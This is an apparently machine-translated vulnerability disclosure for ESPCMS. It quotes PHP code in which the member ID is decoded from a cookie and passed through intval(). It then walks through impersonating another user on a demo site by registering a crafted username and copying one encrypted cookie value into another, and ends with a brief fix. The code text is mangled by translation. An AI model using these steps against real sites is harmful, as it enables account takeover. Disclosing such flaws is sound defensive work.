All ESPCMS versions can be accessed by any user

All ESPCMS versions can be accessed by any user

All ESPCMS versions can be accessed by any user

/Interface/memebermain. php

$rsMember['userid'] = $this->ec_member_username_id;$rsMember['rankname'] = $this->get_member_purview($rsMember['mcid'], 'rankname');$userid = intval($rsMember['userid']);

Follow up with ec_member_username_id

/Public/class_connector.php

$ User_info = explode ('|', $ this-> fun-> eccode ($ this-> fun-> accept ('ecisp _ member_info ', 'C '), 'decode', db_pscode); // from $ _ COOKIE ['ecisp _ member_info '] list ($ response, $ this-> ec_member_alias, $ ec_member_integral, $ ec_member_mcid, $ this-> ec_member_email, $ this-> ec_member_lastip, $ this-> ec_member_ipadd, $ this-> ec_member_useragent, $ this-> ec_member_adminclassurl) = $ user_info; $ this-> ec_member_username_id = intval ($ ec_member_username_id );

To sum up, the $ userid value is fully controllable, taking http://demo.ecisp.cn as an example, the process of using is as follows:

1. Registration, http://demo.ecisp.cn/index.php? Ac = member & at = reg


Assume that you want to log on to $ userid = 3, the user name is 3 test
 

2. After logging in, view the cookie and get

ecisp_member_username=C50S%2BB7auih2gDPIqEsfCZAX5nybIUZ%2FgbPTQp%2F6gm0%3D

3. Change the ecisp_member_info value in the cookie to the ecisp_member_username value,
 

ecisp_member_info=C50S%2BB7auih2gDPIqEsfCZAX5nybIUZ%2FgbPTQp%2F6gm0%3D

In this case, after decryption, you can obtain

$ Userid = $ this-> ec_member_username_id = intval ('3test') = 3



4. Refresh, http://demo.ecisp.cn/index.php again? Ac = membermain & at = center


 

 

Solution:

Switch to session